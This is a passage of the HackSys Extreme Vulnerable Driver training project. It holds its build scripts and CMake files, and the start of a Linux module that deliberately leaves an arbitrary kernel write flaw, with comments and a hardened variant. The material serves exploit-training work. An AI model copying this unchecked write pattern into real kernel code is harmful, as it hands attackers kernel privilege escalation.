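set PROJECT_DIR=%CURRENT_DIR%\..\Driver\

rem Get the normalized path
for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"

set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\vulnerable\%BUILD_ARCH%

rem VS2017U2 contains vswhere.exe; a VSWHERE already set in the environment wins
if "%VSWHERE%"=="" (
    set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
)

echo [+] vswhere path: %VSWHERE%
if not exist "%VSWHERE%" (
    echo [-] vswhere.exe not found, set VSWHERE to its location
    goto :failed
)

rem Ask vswhere for the newest Visual Studio that ships MSBuild; the quoted
rem set keeps the returned path intact even when it contains spaces
set "VS_INSTALL_DIR="
for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
    set "VS_INSTALL_DIR=%%i"
)

if "%VS_INSTALL_DIR%"=="" (
    echo [-] No Visual Studio installation with MSBuild was found
    goto :failed
)

echo [+] Visual Studio Path: %VS_INSTALL_DIR%

set "VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat"

echo [+] Executing: %VSDEVCMD_PATH%

echo.
rem arm64 is cross-compiled, so the host toolchain is pinned to amd64
@call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH% -host_arch=amd64
if errorlevel 1 (
    echo [-] VsDevCmd.bat failed
    goto :failed
)
echo.

echo [+] Build target architecture: %BUILD_ARCH%
echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
echo [+] Build directory: %BUILD_DIR%
echo [+] Removing build directory

rem Quoted so a repository path containing spaces breaks neither the test nor the delete
if exist "%BUILD_DIR%" (
    rmdir /S /Q "%BUILD_DIR%"
)

echo [+] Creating build directory

mkdir "%BUILD_DIR%"
rem /d also switches drive; abort rather than configure in the wrong directory
cd /d "%BUILD_DIR%" || goto :failed

echo [+] Generating build configuration files

cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" "%PROJECT_DIR%" || goto :failed

echo.
echo [+] Building vulnerable HackSys Extreme Vulnerable Driver
echo.

CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v" || goto :failed
echo.

echo [+] Copying built files

rem A missing .sys means no driver was produced, so that move is fatal;
rem the remaining artifacts are moved best-effort as before
echo [*] %PROJECT_NAME%.sys
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%" || goto :failed

echo [*] %PROJECT_NAME%.pdb
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.cat
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.inf
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
echo.

echo [+] Cleaning build directory
rem Keep only the four shipped artifacts. The quoted, case-insensitive compare
rem also copes with files that have no extension, where the unquoted form
rem leaves an empty left operand and cmd aborts the whole script
for /r "%BUILD_DIR%" %%a in (*) do (
    if /i not "%%~xa"==".sys" (
        if /i not "%%~xa"==".pdb" (
            if /i not "%%~xa"==".inf" (
                if /i not "%%~xa"==".cat" (
                    del /f /q "%%a"
                )
            )
        )
    )
)

rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
echo.

echo [+] Built vulnerable HackSys Extreme Vulnerable Driver successfully
cd /d "%CURRENT_DIR%"
echo.
exit /b 0

:failed
echo.
echo [-] Building the vulnerable HackSys Extreme Vulnerable Driver failed
cd /d "%CURRENT_DIR%"
echo.
exit /b 1
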
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_x64.bat:
--------------------------------------------------------------------------------
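@echo off
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Build Utility
echo.

rem Builds the vulnerable (unpatched) Windows flavour of the driver for x64.
rem Run from the Builder directory: the driver sources are located relative
rem to the current directory. Exits with 1 on the first failing step.

rem Target architecture, passed to VsDevCmd.bat and used in the build path
set BUILD_ARCH=x64

rem Store the current directory path so the script can return to it on exit
set CURRENT_DIR=%cd%
set PROJECT_NAME=HEVD
set PROJECT_DIR=%CURRENT_DIR%\..\Driver\

rem Get the normalized path
for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"

set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\vulnerable\%BUILD_ARCH%

rem VS2017U2 contains vswhere.exe; a VSWHERE already set in the environment wins
if "%VSWHERE%"=="" (
    set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
)

echo [+] vswhere path: %VSWHERE%
if not exist "%VSWHERE%" (
    echo [-] vswhere.exe not found, set VSWHERE to its location
    goto :failed
)

rem Ask vswhere for the newest Visual Studio that ships MSBuild; the quoted
rem set keeps the returned path intact even when it contains spaces
set "VS_INSTALL_DIR="
for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
    set "VS_INSTALL_DIR=%%i"
)

if "%VS_INSTALL_DIR%"=="" (
    echo [-] No Visual Studio installation with MSBuild was found
    goto :failed
)

echo [+] Visual Studio Path: %VS_INSTALL_DIR%

set "VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat"

echo [+] Executing: %VSDEVCMD_PATH%

echo.
@call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
if errorlevel 1 (
    echo [-] VsDevCmd.bat failed
    goto :failed
)
echo.

echo [+] Build target architecture: %BUILD_ARCH%
echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
echo [+] Build directory: %BUILD_DIR%
echo [+] Removing build directory

rem Quoted so a repository path containing spaces breaks neither the test nor the delete
if exist "%BUILD_DIR%" (
    rmdir /S /Q "%BUILD_DIR%"
)

echo [+] Creating build directory

mkdir "%BUILD_DIR%"
rem /d also switches drive; abort rather than configure in the wrong directory
cd /d "%BUILD_DIR%" || goto :failed

echo [+] Generating build configuration files

cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" "%PROJECT_DIR%" || goto :failed

echo.
echo [+] Building vulnerable HackSys Extreme Vulnerable Driver
echo.

CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v" || goto :failed
echo.

echo [+] Copying built files

rem A missing .sys means no driver was produced, so that move is fatal;
rem the remaining artifacts are moved best-effort as before
echo [*] %PROJECT_NAME%.sys
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%" || goto :failed

echo [*] %PROJECT_NAME%.pdb
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.cat
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.inf
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
echo.

echo [+] Cleaning build directory
rem Keep only the four shipped artifacts. The quoted, case-insensitive compare
rem also copes with files that have no extension, where the unquoted form
rem leaves an empty left operand and cmd aborts the whole script
for /r "%BUILD_DIR%" %%a in (*) do (
    if /i not "%%~xa"==".sys" (
        if /i not "%%~xa"==".pdb" (
            if /i not "%%~xa"==".inf" (
                if /i not "%%~xa"==".cat" (
                    del /f /q "%%a"
                )
            )
        )
    )
)

rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
echo.

echo [+] Built vulnerable HackSys Extreme Vulnerable Driver successfully
cd /d "%CURRENT_DIR%"
echo.
exit /b 0

:failed
echo.
echo [-] Building the vulnerable HackSys Extreme Vulnerable Driver failed
cd /d "%CURRENT_DIR%"
echo.
exit /b 1
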
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_x64.sh:
--------------------------------------------------------------------------------
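#!/usr/bin/env bash
#
# Builds the vulnerable (unpatched) Linux flavour of the HackSys Extreme
# Vulnerable Driver for x64 and moves the resulting hevd.ko into the binary
# directory.
#
# Run from the Builder directory: the driver sources are located relative to
# $PWD. Exits non-zero on the first failing step.

set -euo pipefail

BANNER="
# # ##### #######
# # ## #### # # # # # # #### # ###### ## # #
# # # # # # # # # # # # # # # # ## ##
####### # # # #### ##### # #### # ##### # # # ## #
# # ###### # # # # # # # # ###### # #
# # # # # # # # # # # # # # # # # # #
# # # # #### # # ##### # #### # ###### # # # #

HackSys Extreme Vulnerable Driver Build Utility
"

echo "${BANNER}"

# Standard constants
BUILD_ARCH=x64
CURRENT_DIR=$PWD
PROJECT_NAME=hevd
PROJECT_DIR="$(realpath -m "${CURRENT_DIR}/../Driver")"
BUILD_DIR="$(realpath -m "${PROJECT_DIR}/../_build")"
BINARY_DIR="$(realpath -m "${PROJECT_DIR}/../build/driver/linux/vulnerable/${BUILD_ARCH}")"

echo "[+] Build target architecture: ${BUILD_ARCH}"
echo "[+] Host Architecture: $(uname -m)"
echo "[+] Build directory: ${BUILD_DIR}"
echo "[+] Binary directory: ${BINARY_DIR}"
echo "[+] Removing build & binary directory"

# Paths are always quoted: an unquoted rm -rf on a path containing spaces
# word-splits and removes something other than the build tree.
if [ -d "${BUILD_DIR}" ]; then
    rm -rf "${BUILD_DIR}"
fi

if [ -d "${BINARY_DIR}" ]; then
    rm -rf "${BINARY_DIR}"
fi

echo "[+] Creating build directory"

mkdir -p "${BUILD_DIR}"
# Abort if the cd fails rather than configuring and cleaning in the wrong directory
cd "${BUILD_DIR}" || exit 1

echo "[+] Generating build configuration files"

cmake -G "Unix Makefiles" "${PROJECT_DIR}"

echo
echo "[+] Building vulnerable HackSys Extreme Vulnerable Driver"
echo

make
echo

echo "[+] Creating binary directory"
mkdir -p "${BINARY_DIR}"

echo "[+] Copying built files"

echo "[*] ${PROJECT_NAME}.ko"
mv -f "${BUILD_DIR}/${PROJECT_NAME}.ko" "${BINARY_DIR}"
echo

echo "[+] Cleaning build directory"

make clean
# Leave the build tree before deleting it so the shell's cwd stays valid
cd "${CURRENT_DIR}"
rm -rf "${BUILD_DIR}"

echo "[+] Built vulnerable HackSys Extreme Vulnerable Driver successfully"
echo
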
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_x86.bat:
--------------------------------------------------------------------------------
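@echo off
rem Build the *vulnerable* Windows variant of HEVD (HEVD.sys) for x86.
rem
rem All paths are derived from this script's own directory, so it can be
rem launched from any working directory. The build tree is recreated on every
rem run and wiped with rmdir /S /Q, so every path is quoted and the script
rem bails out on the first failed step (missing vswhere/VS, failed configure,
rem failed build) instead of moving and cleaning stale artefacts afterwards.
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Build Utility
echo.

rem Target architecture and project layout
set BUILD_ARCH=x86
set CURRENT_DIR=%cd%
set PROJECT_NAME=HEVD
set PROJECT_DIR=%~dp0..\Driver\

rem Get the normalized path
for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"

if not exist "%PROJECT_DIR%" (
    echo [-] Driver project directory not found: %PROJECT_DIR%
    goto :fail
)

set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\vulnerable\%BUILD_ARCH%

rem VS2017U2 and later ship vswhere.exe at this fixed location
if "%VSWHERE%"=="" (
    set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
)

if not exist "%VSWHERE%" (
    echo [-] vswhere.exe not found: %VSWHERE%
    goto :fail
)

for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
    set VS_INSTALL_DIR=%%i
)

if "%VS_INSTALL_DIR%"=="" (
    echo [-] No Visual Studio installation with MSBuild was found
    goto :fail
)

echo [+] Visual Studio Path: %VS_INSTALL_DIR%

set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat

echo [+] Executing: %VSDEVCMD_PATH%

echo.
@call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
echo.

echo [+] Build target architecture: %BUILD_ARCH%
echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
echo [+] Build directory: %BUILD_DIR%
echo [+] Removing build directory

if exist "%BUILD_DIR%" (
    rmdir /S /Q "%BUILD_DIR%"
)

echo [+] Creating build directory

mkdir "%BUILD_DIR%"
cd /d "%BUILD_DIR%" || goto :fail

echo [+] Generating build configuration files

cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" "%PROJECT_DIR%"
if errorlevel 1 (
    echo [-] CMake configuration failed
    goto :fail
)

echo.
echo [+] Building vulnerable HackSys Extreme Vulnerable Driver
echo.

CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
if errorlevel 1 (
    echo [-] Build failed
    goto :fail
)
echo.

echo [+] Copying built files

echo [*] %PROJECT_NAME%.sys
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.pdb
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.cat
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.inf
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
echo.


echo [+] Cleaning build directory
rem Keep only the shipped artefacts. The extensions are quoted so a file
rem without an extension cannot break the comparison, and compared
rem case-insensitively.
for /r "%BUILD_DIR%" %%a in (*) do (
    if /I not "%%~xa"==".sys" (
        if /I not "%%~xa"==".pdb" (
            if /I not "%%~xa"==".inf" (
                if /I not "%%~xa"==".cat" (
                    del /f /q "%%a"
                )
            )
        )
    )
)

rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
echo.

echo [+] Built vulnerable HackSys Extreme Vulnerable Driver successfully
cd /d "%CURRENT_DIR%"
echo.
exit /b 0

:fail
echo.
echo [-] Build aborted
cd /d "%CURRENT_DIR%"
exit /b 1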
105 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | Contributing to HackSys Extreme Vulnerable Driver
2 | =================================================
3 |
4 | To contribute code to **HackSys Extreme Vulnerable Driver (HEVD)** project, please use pull requests via **GitHub**.
5 |
6 | ## Thank you
7 |
8 |
9 | ------------------------------------------------------------------------
10 |
11 | [](https://hacksys.io)
12 |
--------------------------------------------------------------------------------
/Driver/CMake/DetectOS.cmake:
--------------------------------------------------------------------------------
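#
# Detect the operating system and CPU architecture the driver is built for.
#
# Sets, for the top-level CMakeLists.txt:
#   HOST_ARCH_X86 / HOST_ARCH_X64 / HOST_ARCH_ARM64  -- TRUE for the matching one
#   HOST_PLATFORM                                    -- "x86" | "x64" | "arm64"
#   HOST_OS_LINUX / HOST_OS_WINDOWS                  -- TRUE for the matching OS
#
# Fix vs. the previous revision: `set(VAR TRUE BOOL)` stored the two-element
# list "TRUE;BOOL", which only worked because any non-false string is truthy
# in if(); the flags are now plain TRUE.
#

# Detect architecture
if(CMAKE_C_PLATFORM_ID STREQUAL "Windows")
    # MSVC reports its target as X86 / x64 / ARM64 (the mixed case is CMake's).
    if(CMAKE_C_COMPILER_ARCHITECTURE_ID STREQUAL "X86")
        set(HOST_ARCH_X86 TRUE)
        set(HOST_PLATFORM "x86")
    elseif(CMAKE_C_COMPILER_ARCHITECTURE_ID STREQUAL "x64")
        set(HOST_ARCH_X64 TRUE)
        set(HOST_PLATFORM "x64")
    elseif(CMAKE_C_COMPILER_ARCHITECTURE_ID STREQUAL "ARM64")
        set(HOST_ARCH_ARM64 TRUE)
        set(HOST_PLATFORM "arm64")
    endif()
elseif(CMAKE_C_PLATFORM_ID STREQUAL "Linux")
    # Pointer size alone cannot tell x86_64 from aarch64 (both are 8), so check
    # the processor name first and fall back to sizeof(void *) for the x86 family.
    if(CMAKE_SYSTEM_PROCESSOR MATCHES "^(aarch64|arm64)$")
        set(HOST_ARCH_ARM64 TRUE)
        set(HOST_PLATFORM "arm64")
    elseif(CMAKE_SIZEOF_VOID_P EQUAL 4)
        set(HOST_ARCH_X86 TRUE)
        set(HOST_PLATFORM "x86")
    elseif(CMAKE_SIZEOF_VOID_P EQUAL 8)
        set(HOST_ARCH_X64 TRUE)
        set(HOST_PLATFORM "x64")
    endif()
endif()

# Detect host operating system
string(REGEX MATCH "Linux" HOST_OS_LINUX "${CMAKE_SYSTEM_NAME}")

if(WIN32)
    set(HOST_OS_WINDOWS TRUE)
endif()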
33 |
--------------------------------------------------------------------------------
/Driver/CMake/LKM.cmake:
--------------------------------------------------------------------------------
1 | #
2 | # Linux Kernel Module Builder
3 | #
4 |
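# Kernel build tree (headers + kbuild makefiles) of the *running* kernel.
# Out-of-tree modules are built against it with `make -C $KERNEL_DIR M=...`,
# so the resulting .ko loads only on this exact kernel version.
set(KERNEL_DIR "/lib/modules/${CMAKE_HOST_SYSTEM_VERSION}/build")

message(STATUS "KERNEL_VERSION: ${CMAKE_HOST_SYSTEM_VERSION}")
message(STATUS "KERNEL_DIR: ${KERNEL_DIR}")

# Fail at configure time with a readable message instead of letting the
# kbuild invocation die later with an opaque "No such file or directory"
# (a dangling /build symlink also ends up here).
if(NOT IS_DIRECTORY "${KERNEL_DIR}")
    message(FATAL_ERROR "Kernel build directory not found: ${KERNEL_DIR} -- install the kernel headers for ${CMAKE_HOST_SYSTEM_VERSION}")
endif()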
10 |
11 |
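#
# lkm_add_driver(NAME <module> <source.c>...)
#
# Generates HEVD/<system>/Kbuild for the given sources and adds an ALL target
# that runs the kernel's kbuild (`make -C KERNEL_DIR M=<binary dir> modules`)
# to produce <module>.ko in CMAKE_BINARY_DIR. The module name is lower-cased
# because that is the object/.ko name written into the Kbuild file. When the
# variable SECURE is truthy, -DSECURE is added to ccflags-y so the hardened
# `#ifdef SECURE` code paths are compiled instead of the vulnerable ones.
#
function(lkm_add_driver)
    cmake_parse_arguments(LKM "" "NAME" "" ${ARGN})

    # validate the module name -- message(FATAL_ERROR) already stops
    # processing, so the old trailing return() was unreachable
    if(NOT LKM_NAME)
        message(FATAL_ERROR "You should give a name to the module")
    endif()
    string(TOLOWER "${LKM_NAME}" MODULE_NAME)

    # An empty source list would produce a Kbuild with no objects and fail
    # deep inside kbuild; reject it here instead.
    if(NOT LKM_UNPARSED_ARGUMENTS)
        message(FATAL_ERROR "lkm_add_driver(${LKM_NAME}): no source files given")
    endif()

    # kbuild is driven from the kernel tree: M= is our binary dir, src= the
    # directory holding the sources and the generated Kbuild file
    set(KBUILD_COMMAND ${CMAKE_MAKE_PROGRAM} -C ${KERNEL_DIR} M=${CMAKE_BINARY_DIR} src=${CMAKE_SOURCE_DIR}/HEVD/${CMAKE_SYSTEM_NAME})

    set(KBUILD_FILE_PATH "${CMAKE_SOURCE_DIR}/HEVD/${CMAKE_SYSTEM_NAME}/Kbuild")

    # delete the obsolete Kbuild file if exists (it is regenerated below)
    if(EXISTS "${KBUILD_FILE_PATH}")
        message(STATUS "Deleting obsolete Kbuild: ${KBUILD_FILE_PATH}")
        file(REMOVE "${KBUILD_FILE_PATH}")
    endif()

    # one object per source file, all linked into <module>.o
    foreach(MODULE_SOURCE_FILE IN LISTS LKM_UNPARSED_ARGUMENTS)
        get_filename_component(SOURCE_FILE "${MODULE_SOURCE_FILE}" NAME_WE)
        file(APPEND "${KBUILD_FILE_PATH}" "${MODULE_NAME}-m += ${SOURCE_FILE}.o\n")
    endforeach()

    file(APPEND "${KBUILD_FILE_PATH}" "obj-m += ${MODULE_NAME}.o\n")

    # The demo modules deliberately place BUFFER_SIZE-element arrays on the
    # stack, so raise GCC's -Wframe-larger-than= threshold rather than
    # fighting the warning.
    file(APPEND "${KBUILD_FILE_PATH}" "ccflags-y := -Wframe-larger-than=65535\n")

    # if we are building secure version, then set the flag
    if(SECURE)
        file(APPEND "${KBUILD_FILE_PATH}" "ccflags-y += -DSECURE\n")
    endif()

    message(STATUS "Wrote new Kbuild: ${KBUILD_FILE_PATH}")

    # set the output module path
    set(MODULE_BIN_FILE "${CMAKE_BINARY_DIR}/${MODULE_NAME}.ko")

    add_custom_target(
        ${MODULE_NAME}
        ALL COMMAND ${KBUILD_COMMAND} modules
        COMMENT "Compiling Linux Kernel Module: ${MODULE_BIN_FILE}"
    )

    # NOTE: listing CMAKE_BINARY_DIR here makes `make clean` remove the whole
    # build tree (CMakeCache.txt included), not just the generated Kbuild.
    # The Builder scripts rely on exactly that, so it is kept as is.
    set_property(DIRECTORY APPEND PROPERTY ADDITIONAL_MAKE_CLEAN_FILES ${KBUILD_FILE_PATH} ${CMAKE_BINARY_DIR})

endfunction()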
64 |
--------------------------------------------------------------------------------
/Driver/CMakeLists.txt:
--------------------------------------------------------------------------------
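#
# HEVD CMake Script
#
# Entry point for both the Windows (WDK) and Linux (kbuild) builds. OS and
# architecture are taken from the toolchain CMake was configured with
# (CMake/DetectOS.cmake); anything outside {Windows, Linux} x {x86, x64, arm64}
# is rejected at configure time. Configure with -DSECURE=ON to build the
# hardened variant; the driver sources switch on the SECURE preprocessor
# symbol, which the platform modules (LKM.cmake / WDK.cmake) pass through.
#

cmake_minimum_required (VERSION 3.8)

message(
"
## ## ######## ## ## ########
## ## ## ## ## ## ##
## ## ## ## ## ## ##
######### ###### ## ## ## ##
## ## ## ## ## ## ##
## ## ## ## ## ## ##
## ## ######## ### ########

HackSys Extreme Vulnerable Driver
"
)

project("HEVD" C)

set(HEVD_VERSION "3.0")
list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_LIST_DIR}/CMake")

# Declared here so the switch is visible in the cache / cmake-gui with a
# description. A -DSECURE=... given on the command line takes precedence;
# the default (OFF) builds the vulnerable driver, as before.
option(SECURE "Build the hardened (non-vulnerable) variant of HEVD" OFF)

message("Detecting OS and Architecture")
include(DetectOS)

# validate supported OS (message(FATAL_ERROR) stops processing; no return() needed)
if(HOST_OS_LINUX)
    message(STATUS "OS: Linux")
elseif(HOST_OS_WINDOWS)
    message(STATUS "OS: Windows")
else()
    message(FATAL_ERROR "Unsupported OS")
endif()

# Validate supported architecture
if(HOST_ARCH_X64)
    message(STATUS "Architecture: x64")
elseif(HOST_ARCH_X86)
    message(STATUS "Architecture: x86")
elseif(HOST_ARCH_ARM64)
    message(STATUS "Architecture: arm64")
else()
    message(FATAL_ERROR "Unsupported architecture")
endif()

# Pull in the platform-specific driver builder (defines lkm_add_driver on
# Linux; the WDK equivalent on Windows)
if(HOST_OS_WINDOWS)
    message("Locating Windows Driver Kit")
    include(WDK)
elseif(HOST_OS_LINUX)
    message("Locating Linux Kernel Module Builder")
    include(LKM)
endif()

add_subdirectory("HEVD")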
60 |
--------------------------------------------------------------------------------
/Driver/HEVD/CMakeLists.txt:
--------------------------------------------------------------------------------
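#
# Intermediate CMakeLists to add OS dependent directories
#
# HOST_OS_* are set by CMake/DetectOS.cmake via the parent list file, which
# has already rejected unsupported systems; the else() below only guards
# against this file being processed without that check.
#

if(HOST_OS_WINDOWS)
    add_subdirectory("Windows")
elseif(HOST_OS_LINUX)
    add_subdirectory("Linux")
else()
    message(FATAL_ERROR "Neither HOST_OS_WINDOWS nor HOST_OS_LINUX is set; include CMake/DetectOS.cmake first")
endif()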
10 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/ArbitraryWrite.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryWrite.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | arbitrary write vulnerability in the kernel
48 |
49 | --*/
50 |
51 | #include "ArbitraryWrite.h"
52 |
53 |
/**
 * Store one pointer-sized value read from *What at *Where, both addresses
 * supplied by user mode.
 *
 * Only the WRITE_WHAT_WHERE descriptor itself is range-checked. In the
 * vulnerable build the two addresses it carries are dereferenced without any
 * check, so user mode can make the kernel write a chosen value to a chosen
 * (including kernel) address: a write-what-where primitive. The SECURE build
 * additionally range-checks both addresses before the store.
 *
 * @param[in] user_write_what_where the pointer to WRITE_WHAT_WHERE structure
 * @return status code: STATUS_SUCCESS, or -EINVAL when a range check failed
 */
int trigger_arbitrary_write(PWRITE_WHAT_WHERE user_write_what_where)
{
    void *what = NULL;
    void *where = NULL;
    int status = STATUS_SUCCESS;

    /* access_ok() is a range check only (the span lies in the user half of
     * the address space); it does not prove the memory is mapped. */
    if (!x_access_ok(VERIFY_READ, user_write_what_where, sizeof(WRITE_WHAT_WHERE)))
    {
        ERR("[-] Invalid parameters");

        status = -EINVAL;
        return status;
    }

    /* NOTE(review): the descriptor fields are read by dereferencing the user
     * pointer directly instead of via copy_from_user()/get_user(). Kernel code
     * must not touch user memory this way (with SMAP/PAN enabled the access
     * faults in kernel context); presumably the lab kernel runs without those
     * mitigations -- confirm. */
    what = user_write_what_where->What;
    where = user_write_what_where->Where;

    /* Diagnostic logging only. On recent kernels %p prints a hashed value
     * unless pointer hashing is disabled, so these may not be raw addresses. */
    INFO("[+] user_write_what_where: 0x%p\n", user_write_what_where);
    INFO("[+] WRITE_WHAT_WHERE size: 0x%zX\n", sizeof(WRITE_WHAT_WHERE));
    INFO("[+] user_write_what_where->What: 0x%p\n", what);
    INFO("[+] user_write_what_where->Where: 0x%p\n", where);

#ifdef SECURE
    /**
     * Secure Note: This is secure because the developer is properly validating if
     * the addresses held in 'Where' and 'What' reside in User mode, so the store
     * below can no longer target kernel memory. (The accesses themselves are still
     * raw dereferences rather than get_user()/put_user(); see the note above.)
     */

    if (!x_access_ok(VERIFY_READ, what, sizeof(void *)) ||
        !x_access_ok(VERIFY_WRITE, where, sizeof(void *)))
    {
        ERR("[-] Invalid parameters");

        status = -EINVAL;
        return status;
    }

#endif

    INFO("[+] Triggering Arbitrary Write\n");

    /**
     * Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
     * because the developer is writing the value pointed by 'What' to the memory
     * location pointed by 'Where' without validating that either address resides in
     * User mode. 'Where' may therefore be any kernel address of the caller's choosing.
     * This line executes in both builds; in the SECURE build it is only reached after
     * both addresses passed access_ok().
     */

    *((void **) where) = *((void **) what);

    return status;
}
110 |
111 |
/**
 * IOCTL entry point for the arbitrary-write primitive.
 *
 * Treats io->input_buffer as a user-mode WRITE_WHAT_WHERE descriptor and
